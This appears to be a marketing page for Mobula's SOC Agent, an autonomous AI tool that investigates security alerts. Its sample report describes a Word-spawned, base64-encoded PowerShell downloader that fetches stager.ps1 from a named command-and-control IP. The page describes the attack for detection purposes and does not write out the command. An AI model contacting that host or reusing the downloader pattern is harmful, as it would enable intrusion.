Mobula · SOC Agent

Every alert,
already investigated.

Mobula's SOC Agent runs the moment a new alert lands - searching logs, resolving entities, and posting a full structured investigation report before any analyst opens the queue.

<60s

Investigation time

100%

Alert coverage

Fully autonomous

Alert / ALT-2026-4817

HIGHSuspicious PowerShell execution on WIN-FIN-03

SOC Agent Investigation running · step 3 of 5

Agent Report · posted 47s after alert

EntityWIN-FIN-03 / p.morris

Risk score87 / 100

FindingPowerShell spawned from Word with -EncodedCommand flag. Parent process: WINWORD.EXE. Base64 payload decoded to download stager from 185.220.x.x

IOCs found185.220.101.47 · stager.ps1 · T1059.001

VerdictINVESTIGATE

Every alert receives an automatic investigation

The moment Mobula ingests an alert, the SOC Agent fires - no manual trigger, no analyst queue wait. Every alert, regardless of severity, gets the same rigorous automated treatment.

Alert Queue

Severity	Alert	Agent Status	Report	Analyst
HIGH	Suspicious PowerShell on WIN-FIN-03	COMPLETE	47s	Unassigned
CRITICAL	Ransomware staging detected on FIN-DB-03	COMPLETE	38s	m.levy
MEDIUM	Impossible-travel login - m.chen	COMPLETE	52s	Unassigned
LOW	Service account auth outside business hours	COMPLETE	29s	Unassigned

Five investigation steps, run in seconds

The agent follows the same rigorous checklist a senior analyst would - but in under a minute, every time, on every alert.

SOC Agent / Investigation Steps

Entity resolution

Identifies all hosts, users, and IPs involved. Pulls asset context and recent alert history for each.

Log search

Queries SIEM logs around the alert timestamp - parent processes, child spawns, network connections, authentication events.

IOC extraction

Extracts all indicators of compromise: IPs, domains, file hashes, command strings. Checks each against threat intel feeds.

MITRE mapping

Maps observed behavior to the ATT&CK framework and identifies the tactic and technique with confidence scoring.

Verdict and recommendation

Produces a structured report with risk score, key findings, and a recommended next action for the analyst.

Analysts open reports, not raw alerts

When an analyst finally opens the alert, the hard work is already done. The investigation report gives them everything they need to make a confident decision - in under 30 seconds.

Alert / ALT-2026-4817 / Agent Report

Entity Context

HostWIN-FIN-03

Userp.morris

DeptFinance

Recent alerts3 in last 7d

Risk score87 / 100

IOCs Detected

External IP185.220.101.47

Filestager.ps1

TechniqueT1059.001

Parent procWINWORD.EXE

Threat intelKNOWN BAD

Agent Narrative

PowerShell was spawned by WINWORD.EXE on WIN-FIN-03 at 14:22 using a base64-encoded command. The decoded payload contacted 185.220.101.47 - a known C2 infrastructure IP flagged by 7 threat intel feeds. This pattern is consistent with a macro-delivered downloader. The host is in the Finance segment with access to sensitive data stores. Recommend immediate containment.

Autonomous · Instant · Thorough

Every alert investigated - before your analyst opens it.

SOC Agent turns a queue of raw alerts into a stack of ready-to-decide cases. Your analysts spend time on judgment, not legwork.

Mobula SOC Agent · runs fully air-gapped · no data leaves the tenant